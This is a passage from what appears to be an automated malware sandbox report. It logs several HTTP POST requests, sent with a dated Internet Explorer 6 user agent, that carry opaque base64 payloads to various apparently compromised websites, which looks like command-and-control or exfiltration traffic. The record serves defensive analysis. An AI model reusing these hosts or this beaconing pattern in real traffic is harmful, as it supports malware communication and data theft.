58 45 43 61 75 6c 54 76 46 43 6c 47 4f 69 6a 39 37 61 30 6f 79 77 77 56 57 45 34 63 5a 39 46 56 4c 31 69 69 79 6b 36 45 77 77 58 54 59 51 66 74 39 38 64 52 43 33 76 31 66 78 62 77 77 56 71 2b 31 31 74 47 6f 38 6d 71 41 77 44 59 32 31 2b 6d 53 78 70 61 6e 45 46 49 30 73 67 64 74 50 54 74 64 61 76 32 69 58 4d 68 76 68 42 47 50 4a 30 56 71 77 45 35 77 71 34 38 62 39 38 7a 78 38 41 71 4c 77 4b 2f 62 6e 62 79 66 2b 58 61 57 43 68 76 4b 63 66 77 6b 70 69 49 67 55 32 73 36 43 67 35 42 62 6d 59 50 4d 6c 33 41 72 6e 6e 5a 61 66 2b 78 33 58 37 46 7a 45 37 54 34 65 62 47 50 61 4d 54 77 4f 6c 51 45 30 42 4a 68 39 6f 4a 58 39 6e 61 58 30 6b 6e 55 66 55 79 48 30 39 55 74 49 4d 53 61 6a 58 34 67 4c 2b 62 74 30 58 65 41 31 65 58 70 70 34 47 2b 4e 36 46 43 59 6f 35 65 61 49 62 5a 59 4b 30 32 4e 36 35 6e 45 33 2f Data Ascii: cS7/Y50tapgcfw6s1NJUvNazJCNLzSYCIXB64tneW40Oea7ycHQeXUbfXLEFVs4ovdV5nJbPZHWNkEsj38kwpFWuTDM4lcH0CPLehGlG2P7DHPCwVu1it/uRR8jXGZdBmgRAUSKD7MzE4xZLbF28IA97yzUMIeoDp4IXcLadm4f74RMhi1rJb8akcynBC3JZ66GbxFNqcUcfZGnqTFeU0PhoC9I+Ca/Wa/2pYIamQN2mQH1JWRRzGE5X651m7LxQSTe39Y3uWUp3Fe+ZcnfBHTg949HtP0g/jlzsa0rXMJgd/t8nb5gyMxTXECaulTvFClGOij97a0oywwVWE4cZ9FVL1iiyk6EwwXTYQft98dRC3v1fxbwwVq+11tGo8mqAwDY21+mSxpanEFI0sgdtPTtdav2iXMhvhBGPJ0VqwE5wq48b98zx8AqLwK/bnbyf+XaWChvKcfwkpiIgU2s6Cg5BbmYPMl3ArnnZaf+x3X7FzE7T4ebGPaMTwOlQE0BJh9oJX9naX0knUfUyH09UtIMSajX4gL+bt0XeA1eXpp4G+N6FCYo5eaIbZYK02N65nE3/
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 6b 30 52 73 2f 33 67 71 69 4a 69 47 2f 72 45 65 2b 2b 76 38 59 57 74 51 74 2f 72 41 4e 75 34 4f 4c 41 30 6a 4f 52 66 71 4b 73 69 44 35 76 78 48 30 6a 52 6e 42 42 47 78 48 76 43 66 55 77 47 65 70 38 77 41 79 35 59 73 51 42 77 4d 53 4a 76 70 64 69 4d 52 77 78 65 72 54 47 6f 7a 70 6e 46 5a 79 4f 56 53 56 57 71 31 4a 67 70 70 51 74 4c 69 32 4f 66 74 77 76 6d 6b 6d 6c 64 59 35 37 77 41 2f 36 46 72 49 39 43 68 30 34 6a 50 69 53 33 6f 48 6d 33 34 42 73 63 72 4a 74 4b 58 6f 71 53 6e 54 5a 70 74 35 4e 59 64 6a 34 51 68 66 30 76 65 70 68 73 67 70 74 78 6f 54 78 67 57 72 44 74 4d 4e 35 73 4e 34 68 6b 53 72 38 75 57 6f 43 77 67 45 68 67 7a 7a 59 65 41 38 70 2f 78 57 33 6c 4e 52 4f 37 45 6a 4c 66 32 50 4b 39 51 65 63 41 46 41 37 45 41 78 31 46 54 4c 32 6f 65 72 38 72 76 45 79 68 67 53 46 58 51 7a 65 47 4d 38 7a 6a 58 61 74 32 65 69 70 43 41 4d 57 31 35 71 53 4f 52 4e 65 62 57 35 75 52 39 6a 33 63 6d 6e 4f 66 73 75 4f 2f 74 50 51 57 61 77 33 34 4e 53 31 78 77 61 38 51 51 6d 46 78 35 71 7a 57 42 51 77 79 41 34 50 31 43 4c 33 49 65 65 62 4f 6f 48 4b 39 6b 79 7a 57 63 47 47 44 47 39 62 30 76 4f 65 68 53 50 4a 38 6b 69 5a 32 4f 30 43 31 6d 75 62 4f 57 4b 76 75 31 59 57 67 61 43 32 38 69 62 58 79 38 57 65 34 6b 66 52 76 50 53 4a 76 65 69 2f 52 67 42 55 79 67 48 6f 61 53 4a 57 33 31 34 6d 39 64 67 53 69 6b 6b 46 7a 7a 68 56 4a 41 56 2b 53 58 57 65 4b 5a 4a 50 63 32 44 7a 35 73 48 39 5a 45 53 37 32 71 54 63 35 4b 56 4b 4b 30 6f 74 2f 6b 7a 4b 44 70 63 4b 67 32 73 5a 76 74 43 6a 6a 41 32 2b 6e 6d 2b 43 4d 4a 70 6a 6a 6c 59 7a 69 6b 4c 36 36 58 4d 47 46 79 2f 4f 53 31 32 70 63 79 43 48 4f 4c 46 4e 6c 57 76 54 30 3d Data Ascii: k0Rs/3gqiJiG/rEe++v8YWtQt/rANu4OLA0jORfqKsiD5vxH0jRnBBGxHvCfUwGep8wAy5YsQBwMSJvpdiMRwxerTGozpnFZyOVSVWq1JgppQtLi2OftwvmkmldY57wA/6FrI9Ch04jPiS3oHm34BscrJtKXoqSnTZpt5NYdj4Qhf0vephsgptxoTxgWrDtMN5sN4hkSr8uWoCwgEhgzzYeA8p/xW3lNRO7EjLf2PK9QecAFA7EAx1FTL2oer8rvEyhgSFXQzeGM8zjXat2eipCAMW15qSORNebW5uR9j3cmnOfsuO/tPQWaw34NS1xwa8QQmFx5qzWBQwyA4P1CL3IeebOoHK9kyzWcGGDG9b0vOehSPJ8kiZ2O0C1mubOWKvu1YWgaC28ibXy8We4kfRvPSJvei/RgBUygHoaSJW314m9dgSikkFzzhVJAV+SXWeKZJPc2Dz5sH9ZES72qTc5KVKK0ot/kzKDpcKg2sZvtCjjA2+nm+CMJpjjlYzikL66XMGFy/OS12pcyCHOLFNlWvT0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 61 74 6b 44 41 46 6b 76 69 4a 67 43 42 42 35 79 61 4e 44 6e 33 66 4a 6b 73 30 53 33 6c 30 70 43 6e 64 66 6d 64 47 41 69 37 61 72 33 6b 62 62 4d 38 2b 43 73 48 2b 56 34 4b 66 52 72 4b 77 77 6b 66 35 78 50 2f 78 5a 57 61 56 47 45 33 32 6c 37 61 56 79 79 68 4f 63 79 30 2f 62 48 73 6b 4e 69 59 75 45 51 74 66 6d 54 74 59 68 74 56 2b 71 66 32 49 41 39 45 47 59 7a 4e 6a 4e 76 4d 73 6f 4a 30 51 77 41 70 62 34 69 77 6d 71 43 7a 33 65 41 32 4e 6b 32 66 37 2b 55 74 2b 76 2b 45 52 41 59 46 34 4f 39 61 62 63 79 52 4f 37 48 38 7a 57 77 44 74 57 71 47 4e 53 68 76 48 56 35 56 6d 46 6e 71 64 48 73 39 4c 76 32 4f 69 56 67 39 57 66 48 54 56 46 48 50 30 36 58 79 37 46 66 78 2b 45 30 61 56 4a 77 75 76 4f 41 4f 54 65 7a 30 54 4b 45 36 5a 51 63 38 59 46 53 44 4a 79 4e 61 45 71 2b 2b 79 47 69 30 6f 75 35 41 49 77 41 52 5a 39 76 35 74 59 66 5a 41 6b 39 45 2f 73 67 70 4f 36 44 79 53 69 35 4b 49 78 57 32 36 78 67 69 38 44 63 79 67 35 57 48 67 4b 54 6f 51 44 44 77 62 69 49 70 70 6a 58 55 6e 51 6e 4c 36 6d 73 6b 49 69 31 37 31 42 41 52 70 62 31 35 30 35 41 72 4e 52 2b 55 67 4f 54 51 68 71 65 34 51 46 7a 63 58 49 79 34 76 55 42 6e 56 2f 56 4d 67 77 4a 39 36 61 51 61 44 30 66 67 61 6f 47 59 74 42 54 6b 78 48 6e 45 75 54 30 36 53 51 42 70 31 48 6f 6b 4a 5a 72 36 61 68 61 6f 62 72 44 68 53 49 4a 50 47 76 33 45 7a 63 66 4d 46 48 2f 45 53 2b 38 74 56 69 55 43 35 72 37 65 44 64 5a 58 49 35 7a 4d 74 5a 45 32 71 7a 63 52 7a 49 62 55 6d 30 42 74 4e 41 6e 39 71 35 48 6b 43 39 32 6a 78 58 69 4e 57 50 30 41 6c 37 68 71 57 2b 4d 33 31 70 39 5a 46 44 6b 38 66 61 70 66 36 4f 58 4b 43 33 73 49 4a 6d 45 4b 65 6a 6d 53 49 65 43 50 45 54 62 49 76 53 4c 38 51 33 45 47 69 4d 6f 35 39 39 4f 32 31 62 74 45 55 74 72 Data Ascii: atkDAFkviJgCBB5yaNDn3fJks0S3l0pCndfmdGAi7ar3kbbM8+CsH+V4KfRrKwwkf5xP/xZWaVGE32l7aVyyhOcy0/bHskNiYuEQtfmTtYhtV+qf2IA9EGYzNjNvMsoJ0QwApb4iwmqCz3eA2Nk2f7+Ut+v+ERAYF4O9abcyRO7H8zWwDtWqGNShvHV5VmFnqdHs9Lv2OiVg9WfHTVFHP06Xy7Ffx+E0aVJwuvOAOTez0TKE6ZQc8YFSDJyNaEq++yGi0ou5AIwARZ9v5tYfZAk9E/sgpO6DySi5KIxW26xgi8Dcyg5WHgKToQDDwbiIppjXUnQnL6mskIi171BARpb1505ArNR+UgOTQhqe4QFzcXIy4vUBnV/VMgwJ96aQaD0fgaoGYtBTkxHnEuT06SQBp1HokJZr6ahaobrDhSIJPGv3EzcfMFH/ES+8tViUC5r7eDdZXI5zMtZE2qzcRzIbUm0BtNAn9q5HkC92jxXiNWP0Al7hqW+M31p9ZFDk8fapf6OXKC3sIJmEKejmSIeCPETbIvSL8Q3EGiMo599O21btEUtr
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 44 42 57 55 2f 38 4d 72 69 4a 68 69 50 49 65 44 79 74 37 54 67 75 77 69 6c 77 42 70 5a 56 2b 79 70 37 58 43 65 61 50 34 7a 58 44 41 6a 34 38 52 59 61 45 63 61 55 68 54 70 6d 4c 2b 2f 42 47 4e 38 49 44 4b 36 46 63 2f 48 4b 79 54 36 50 59 53 57 73 74 42 43 35 35 2f 61 4f 2f 34 5a 71 39 37 53 75 45 59 71 75 66 72 4f 6f 4a 6d 75 42 6e 49 30 30 7a 5a 37 61 37 4a 55 2f 76 6f 2f 41 4f 57 34 4c 43 74 45 7a 43 53 50 62 6c 41 7a 4f 61 6e 49 35 48 52 45 49 68 77 52 4f 79 6e 69 4a 44 68 2b 4c 6b 4d 6d 67 64 53 63 51 75 69 71 50 35 54 65 35 7a 75 7a 68 35 75 74 36 67 79 4e 61 30 6b 59 4b 33 71 42 52 65 63 75 44 4c 5a 55 62 6f 65 34 55 2f 4b 36 2f 6a 4c 6b 33 61 35 68 6a 54 7a 47 53 79 49 63 75 62 43 59 42 39 6e 6d 45 52 46 35 2f 7a 2b 63 4e 4d 44 38 6f 38 30 6d 63 37 61 6e 43 79 32 47 55 46 45 4b 64 65 6e 33 32 62 55 76 45 45 2b 53 33 39 4a 36 2f 76 38 33 38 54 69 7a 67 6a 65 7a 37 5a 53 33 66 63 74 57 43 64 33 79 63 50 54 2f 61 4d 39 56 6d 6c 68 52 5a 4f 79 63 73 6b 38 46 4f 69 49 2f 56 54 32 64 35 70 6a 39 6a 39 6e 30 71 33 74 4f 5a 48 68 54 6d 42 6a 68 78 71 57 38 2b 70 39 62 55 63 67 53 6d 66 2f 32 70 4f 59 4a 77 50 38 5a 43 71 39 37 48 6a 65 76 52 42 4f 34 2b 59 4f 73 35 31 42 71 68 67 67 44 79 4a 76 49 77 31 43 51 75 45 64 2f 36 37 64 55 73 52 62 73 72 32 58 56 38 6a 55 54 6b 32 7a 70 61 4f 68 57 38 44 66 44 78 69 59 38 6e 61 52 76 4f 44 79 35 54 76 4d 30 30 34 72 4c 61 42 6f 44 6e 4a 57 58 31 6e 37 77 65 30 4d 2f 58 74 4b 68 76 33 52 6f 6d 57 2f 68 58 55 47 51 7a 67 4a 55 47 4b 41 4e 59 38 46 5a 6e 65 35 58 4e 6d 43 75 43 50 34 47 61 5a 46 2f 43 73 75 2f 77 43 56 69 68 6a 48 69 41 3d 3d Data Ascii: DBWU/8MriJhiPIeDyt7TguwilwBpZV+yp7XCeaP4zXDAj48RYaEcaUhTpmL+/BGN8IDK6Fc/HKyT6PYSWstBC55/aO/4Zq97SuEYqufrOoJmuBnI00zZ7a7JU/vo/AOW4LCtEzCSPblAzOanI5HREIhwROyniJDh+LkMmgdScQuiqP5Te5zuzh5ut6gyNa0kYK3qBRecuDLZUboe4U/K6/jLk3a5hjTzGSyIcubCYB9nmERF5/z+cNMD8o80mc7anCy2GUFEKden32bUvEE+S39J6/v838Tizgjez7ZS3fctWCd3ycPT/aM9VmlhRZOycsk8FOiI/VT2d5pj9j9n0q3tOZHhTmBjhxqW8+p9bUcgSmf/2pOYJwP8ZCq97HjevRBO4+YOs51BqhggDyJvIw1CQuEd/67dUsRbsr2XV8jUTk2zpaOhW8DfDxiY8naRvODy5TvM004rLaBoDnJWX1n7we0M/XtKhv3RomW/hXUGQzgJUGKANY8FZne5XNmCuCP4GaZF/Csu/wCVihjHiA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 44 42 57 55 2f 38 4d 72 69 4a 68 69 50 49 65 44 79 74 37 54 67 75 77 69 6c 77 42 70 5a 56 2b 79 70 37 58 43 65 61 50 34 7a 58 44 41 6a 34 38 52 59 61 45 63 61 55 68 54 70 6d 4c 2b 2f 42 47 4e 38 49 44 4b 36 46 63 2f 48 4b 79 54 36 50 59 53 57 73 74 42 43 35 35 2f 61 4f 2f 34 5a 71 39 37 53 75 45 59 71 75 66 72 4f 6f 4a 6d 75 42 6e 49 30 30 7a 5a 37 61 37 4a 55 2f 76 6f 2f 41 4f 57 34 4c 43 74 45 7a 43 53 50 62 6c 41 7a 4f 61 6e 49 35 48 52 45 49 68 77 52 4f 79 6e 69 4a 44 68 2b 4c 6b 4d 6d 67 64 53 63 51 75 69 71 50 35 54 65 35 7a 75 7a 68 35 75 74 36 67 79 4e 61 30 6b 59 4b 33 71 42 52 65 63 75 44 4c 5a 55 62 6f 65 34 55 2f 4b 36 2f 6a 4c 6b 33 61 35 68 6a 54 7a 47 53 79 49 63 75 62 43 59 42 39 6e 6d 45 52 46 35 2f 7a 2b 63 4e 4d 44 38 6f 38 30 6d 63 37 61 6e 43 79 32 47 55 46 45 4b 64 65 6e 33 32 62 55 76 45 45 2b 53 33 39 4a 36 2f 76 38 33 38 54 69 7a 67 6a 65 7a 37 5a 53 33 66 63 74 57 43 64 33 79 63 50 54 2f 61 4d 39 56 6d 6c 68 52 5a 4f 79 63 73 6b 38 46 4f 69 49 2f 56 54 32 64 35 70 6a 39 6a 39 6e 30 71 33 74 4f 5a 48 68 54 6d 42 6a 68 78 71 57 38 2b 70 39 62 55 63 67 53 6d 66 2f 32 70 4f 59 4a 77 50 38 5a 43 71 39 37 48 6a 65 76 52 42 4f 34 2b 59 4f 73 35 31 42 71 68 67 67 44 79 4a 76 49 77 31 43 51 75 45 64 2f 36 37 64 55 73 52 62 73 72 32 58 56 38 6a 55 54 6b 32 7a 70 61 4f 68 57 38 44 66 44 78 69 59 38 6e 61 52 76 4f 44 79 35 54 76 4d 30 30 34 72 4c 61 42 6f 44 6e 4a 57 58 31 6e 37 77 65 30 4d 2f 58 74 4b 68 76 33 52 6f 6d 57 2f 68 58 55 47 51 7a 67 4a 55 47 4b 41 4e 59 38 46 5a 6e 65 35 58 4e 6d 43 75 43 50 34 47 61 5a 46 2f 43 73 75 2f 77 43 56 69 68 6a 48 69 41 3d 3d Data Ascii: DBWU/8MriJhiPIeDyt7TguwilwBpZV+yp7XCeaP4zXDAj48RYaEcaUhTpmL+/BGN8IDK6Fc/HKyT6PYSWstBC55/aO/4Zq97SuEYqufrOoJmuBnI00zZ7a7JU/vo/AOW4LCtEzCSPblAzOanI5HREIhwROyniJDh+LkMmgdScQuiqP5Te5zuzh5ut6gyNa0kYK3qBRecuDLZUboe4U/K6/jLk3a5hjTzGSyIcubCYB9nmERF5/z+cNMD8o80mc7anCy2GUFEKden32bUvEE+S39J6/v838Tizgjez7ZS3fctWCd3ycPT/aM9VmlhRZOycsk8FOiI/VT2d5pj9j9n0q3tOZHhTmBjhxqW8+p9bUcgSmf/2pOYJwP8ZCq97HjevRBO4+YOs51BqhggDyJvIw1CQuEd/67dUsRbsr2XV8jUTk2zpaOhW8DfDxiY8naRvODy5TvM004rLaBoDnJWX1n7we0M/XtKhv3RomW/hXUGQzgJUGKANY8FZne5XNmCuCP4GaZF/Csu/wCVihjHiA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 6a 45 4a 75 36 34 44 55 6a 35 67 74 79 6a 64 46 55 37 33 6e 43 72 4e 7a 6f 61 70 6f 7a 56 42 55 74 49 75 77 7a 62 63 46 62 36 52 58 5a 50 46 48 38 65 6c 39 38 71 43 58 70 36 67 6d 75 6a 5a 52 35 36 36 38 43 48 57 43 56 6a 48 33 66 43 52 75 32 75 49 58 78 4c 4b 7a 52 4e 4a 6b 4a 70 46 58 7a 44 64 4c 47 6d 78 6f 49 76 43 43 4d 32 67 2f 73 4f 4b 6e 32 2f 53 32 54 4b 54 4f 6a 33 35 44 56 6a 78 4b 41 6d 55 39 34 78 7a 4e 37 5a 64 63 75 49 34 34 6f 5a 36 56 4b 39 72 5a 49 47 53 35 35 4d 70 44 75 45 44 53 6e 62 51 6f 49 51 55 52 42 76 51 6d 4a 58 39 37 69 79 57 69 55 78 31 49 47 52 6f 65 76 74 69 6f 74 75 31 47 2b 74 55 47 31 45 41 55 4c 68 69 66 61 49 4a 7a 6b 43 51 70 43 2b 73 4a 41 70 79 63 6f 61 48 37 74 63 4d 6e 65 5a 65 66 4e 38 68 51 4f 4b 59 77 45 4e 72 57 62 6a 58 36 31 56 6c 34 31 58 6b 46 59 4d 53 53 43 67 73 73 4f 6a 69 5a 56 74 71 69 56 45 56 53 56 57 69 52 50 54 67 5a 55 4b 63 6c 53 50 48 6e 31 77 66 6d 74 53 48 32 64 64 55 44 69 4c 32 6f 39 65 42 2f 4b 48 6e 2b 2b 43 73 48 74 51 30 55 62 58 55 79 61 44 6e 31 77 62 34 31 4e 48 54 66 76 41 2f 4c 37 6d 6d 4a 73 56 44 68 6b 78 31 77 32 69 50 6b 45 37 71 51 35 57 34 2b 77 79 48 63 54 42 36 50 2b 69 31 5a 34 45 6c 4f 33 4f 70 56 39 2b 41 53 56 33 2f 4e 47 36 46 45 43 42 50 78 69 68 70 2f 33 36 2b 34 4d 6c 4d 4e 33 73 46 37 58 43 6c 4a 54 75 53 55 50 37 72 52 65 32 52 70 5a 46 4e 55 2b 4b 51 4d 30 46 4f 49 45 77 48 6a 4e 33 68 70 4f 30 54 6e 73 65 38 52 52 35 63 47 38 75 32 70 7a 52 5a 51 36 6d 6f 78 61 2b 51 75 74 6b 45 31 59 53 74 7a 59 43 6d 77 35 78 4f 34 78 69 53 63 50 49 36 72 46 2b 47 45 55 2b 78 4e 31 6d 5a 73 46 67 37 78 44 4f 73 30 4d 77 3d 3d Data Ascii: jEJu64DUj5gtyjdFU73nCrNzoapozVBUtIuwzbcFb6RXZPFH8el98qCXp6gmujZR5668CHWCVjH3fCRu2uIXxLKzRNJkJpFXzDdLGmxoIvCCM2g/sOKn2/S2TKTOj35DVjxKAmU94xzN7ZdcuI44oZ6VK9rZIGS55MpDuEDSnbQoIQURBvQmJX97iyWiUx1IGRoevtiotu1G+tUG1EAULhifaIJzkCQpC+sJApycoaH7tcMneZefN8hQOKYwENrWbjX61Vl41XkFYMSSCgssOjiZVtqiVEVSVWiRPTgZUKclSPHn1wfmtSH2ddUDiL2o9eB/KHn++CsHtQ0UbXUyaDn1wb41NHTfvA/L7mmJsVDhkx1w2iPkE7qQ5W4+wyHcTB6P+i1Z4ElO3OpV9+ASV3/NG6FECBPxihp/36+4MlMN3sF7XClJTuSUP7rRe2RpZFNU+KQM0FOIEwHjN3hpO0Tnse8RR5cG8u2pzRZQ6moxa+QutkE1YStzYCmw5xO4xiScPI6rF+GEU+xN1mZsFg7xDOs0Mw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=89114abc8f12de8cbbbabddf86489f60|102.129.143.43|1685537415|1685537397|9|2|0; snkz=102.129.143.43Data Raw: 68 50 6c 2f 2f 43 73 53 69 4a 69 62 52 6c 6c 47 41 67 48 49 2b 4a 53 5a 45 37 62 78 58 2f 68 38 6a 38 37 44 38 63 57 33 6d 6e 47 2f 47 67 2b 43 4b 4c 5a 6f 32 38 2f 33 71 33 38 57 31 68 43 46 41 54 62 51 41 43 76 39 34 70 62 72 51 4d 6d 4e 6f 67 63 70 49 52 56 76 6c 48 36 57 2f 4e 49 42 42 66 52 63 66 49 55 44 6e 53 43 4c 47 32 51 79 61 6c 70 53 61 6d 72 71 32 55 58 45 51 59 52 6c 4d 45 71 4b 68 4d 35 70 49 4b 2b 66 36 71 42 54 47 68 57 48 4a 4a 52 68 59 4b 59 53 30 43 61 66 64 42 2f 6e 5a 7a 77 53 57 33 61 7a 4c 76 72 79 74 41 41 4c 73 79 79 65 58 63 33 46 63 5a 47 38 2b 52 7a 76 72 4c 63 70 67 68 41 6c 64 31 61 2f 55 4d 47 4b 55 77 45 6e 6c 6e 62 58 35 6c 2f 59 75 45 39 4d 77 5a 43 44 38 65 4f 32 33 36 77 6b 45 67 62 42 34 46 49 6d 50 37 4c 5a 6f 77 75 55 51 6f 63 6c 75 33 49 63 72 4e 39 67 67 62 63 62 70 4e 76 33 4d 64 7a 7a 51 6c 6e 77 44 66 36 45 6d 69 38 6d 47 32 2b 66 67 68 72 77 6b 7a 79 45 69 49 6f 75 70 65 39 62 55 41 42 42 2f 31 76 4d 42 45 54 64 51 49 38 36 33 69 2b 75 4c 6a 6a 4f 30 6c 4f 42 2b 43 79 72 78 49 6b 56 41 30 6d 43 2f 6b 75 4b 79 65 56 6b 74 46 37 74 49 61 2b 42 4c 71 7a 7a 42 32 65 6d 64 43 50 34 59 6a 55 4f 6b 68 31 36 6b 6e 68 38 7a 6b 35 64 55 50 39 4b 45 76 53 4f 41 52 38 36 2b 79 38 62 59 32 47 72 6b 67 48 6e 42 62 54 4d 45 61 62 72 50 35 39 4d 63 4c 62 54 64 35 76 6a 42 34 68 50 5a 2b 4f 42 70 76 56 42 62 57 4e 55 44 2b 42 44 76 74 38 56 52 6a 4f 4c 78 4c 36 33 52 71 42 61 49 6b 36 64 4b 35 55 4c 4c 4b 76 6a 78 42 67 7a 69 50 34 63 76 48 67 78 32 33 2b 75 47 76 61 66 72 2b 43 63 66 65 79 4b 4b 6e 44 4a 68 73 69 34 70 6b 6f 2b 34 71 70 2b 77 4a 6d 67 48 59 37 6e 49 4b 78 42 69 38 58 61 56 74 72 56 77 41 48 4c 44 38 58 72 51 63 68 51 52 2b 47 76 78 61 73 77 33 69 61 37 70 39 6f 3d Data Ascii: hPl//CsSiJibRllGAgHI+JSZE7bxX/h8j87D8cW3mnG/Gg+CKLZo28/3q38W1hCFATbQACv94pbrQMmNogcpIRVvlH6W/NIBBfRcfIUDnSCLG2QyalpSamrq2UXEQYRlMEqKhM5pIK+f6qBTGhWHJJRhYKYS0CafdB/nZzwSW3azLvrytAALsyyeXc3FcZG8+RzvrLcpghAld1a/UMGKUwEnlnbX5l/YuE9MwZCD8eO236wkEgbB4FImP7LZowuUQoclu3IcrN9ggbcbpNv3MdzzQlnwDf6Emi8mG2+fghrwkzyEiIoupe9bUABB/1vMBETdQI863i+uLjjO0lOB+CyrxIkVA0mC/kuKyeVktF7tIa+BLqzzB2emdCP4YjUOkh16knh8zk5dUP9KEvSOAR86+y8bY2GrkgHnBbTMEabrP59McLbTd5vjB4hPZ+OBpvVBbWNUD+BDvt8VRjOLxL63RqBaIk6dK5ULLKvjxBgziP4cvHgx23+uGvafr+CcfeyKKnDJhsi4pko+4qp+wJmgHY7nIKxBi8XaVtrVwAHLD8XrQchQR+Gvxasw3ia7p9o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=cftnkefqbeovadfhcumfjapsdjszgtwkData Raw: 68 68 58 45 46 62 56 44 65 4a 67 32 69 70 42 72 48 49 45 78 67 71 37 6c 6f 54 6c 44 47 51 35 4d 75 56 75 38 36 62 34 66 70 6b 4b 58 4c 77 6f 64 51 69 63 41 32 38 71 42 2f 45 2b 47 6f 68 64 35 55 73 2f 74 4b 48 30 58 6a 68 74 6e 41 75 38 36 47 5a 77 75 64 46 30 78 31 71 36 73 49 56 54 7a 76 7a 75 76 6e 6d 7a 65 2f 78 35 47 75 39 41 65 47 42 45 37 4b 34 6f 45 49 6e 54 50 37 59 6e 5a 55 2f 2b 42 46 72 50 35 31 6a 38 76 61 37 66 2f 6d 59 53 46 42 6b 4d 55 39 30 52 46 35 70 58 41 73 4d 4b 31 51 52 32 53 68 6f 64 68 6f 35 5a 66 4f 6c 4b 7a 65 54 75 62 5a 42 4d 32 6c 75 38 35 35 48 30 6f 54 6c 64 32 56 6b 41 66 49 77 33 69 65 6c 63 4b 42 72 50 47 5a 67 58 33 79 2f 74 71 32 73 6d 63 36 4b 6a 36 4f 55 6e 34 50 57 59 79 6f 72 2b 34 51 6b 38 36 6b 42 4c 30 59 46 56 51 73 4f 67 6f 6b 6e 70 52 39 6b 74 4a 74 4d 36 39 57 2b 65 71 74 69 6b 4c 42 57 41 7a 55 6f 4b 58 56 2b 44 34 50 66 45 71 5a 35 42 2f 69 7a 6c 62 65 36 76 6b 5a 32 44 73 79 31 73 53 36 42 35 50 2f 51 41 4f 2b 2f 78 4f 78 33 58 4e 72 4c 36 72 32 4e 45 37 33 35 55 41 4a 31 55 70 33 67 58 47 34 4d 72 79 38 56 50 38 4d 45 64 77 6a 76 6f 47 69 4b 6f 4a 71 35 74 39 65 7a 66 55 76 57 69 43 71 30 7a 58 65 4b 69 4d 57 51 6c 67 79 59 39 6d 33 4e 58 5a 5a 57 5a 46 63 68 50 6f 33 63 4f 49 5a 66 63 54 67 2b 50 79 35 78 51 74 4d 4e 47 63 72 36 6e 50 6b 70 6a 39 4d 30 63 76 62 4e 50 4e 62 6f 30 46 41 54 59 4c 43 57 67 76 64 34 52 5a 42 57 37 69 71 4c 63 4a 2f 61 37 53 67 46 58 57 52 56 2b 47 42 49 59 6f 34 55 35 56 56 30 6d 32 37 50 7a 71 66 4b 61 39 45 70 45 34 73 62 4f 70 73 63 6f 61 6a 30 75 6d 6e 61 7a 43 4f 38 35 52 71 6b 71 76 6d 32 35 76 30 57 72 36 52 73 31 77 6f 62 42 6b 6c 70 35 44 66 39 67 56 61 76 75 54 79 47 42 42 46 39 2f 52 4c 41 3d 3d Data Ascii: hhXEFbVDeJg2ipBrHIExgq7loTlDGQ5MuVu86b4fpkKXLwodQicA28qB/E+Gohd5Us/tKH0XjhtnAu86GZwudF0x1q6sIVTzvzuvnmze/x5Gu9AeGBE7K4oEInTP7YnZU/+BFrP51j8va7f/mYSFBkMU90RF5pXAsMK1QR2Shodho5ZfOlKzeTubZBM2lu855H0oTld2VkAfIw3ielcKBrPGZgX3y/tq2smc6Kj6OUn4PWYyor+4Qk86kBL0YFVQsOgoknpR9ktJtM69W+eqtikLBWAzUoKXV+D4PfEqZ5B/izlbe6vkZ2Dsy1sS6B5P/QAO+/xOx3XNrL6r2NE735UAJ1Up3gXG4Mry8VP8MEdwjvoGiKoJq5t9ezfUvWiCq0zXeKiMWQlgyY9m3NXZZWZFchPo3cOIZfcTg+Py5xQtMNGcr6nPkpj9M0cvbNPNbo0FATYLCWgvd4RZBW7iqLcJ/a7SgFXWRV+GBIYo4U5VV0m27PzqfKa9EpE4sbOpscoaj0umnazCO85Rqkqvm25v0Wr6Rs1wobBklp5Df9gVavuTyGBBF9/RLA==
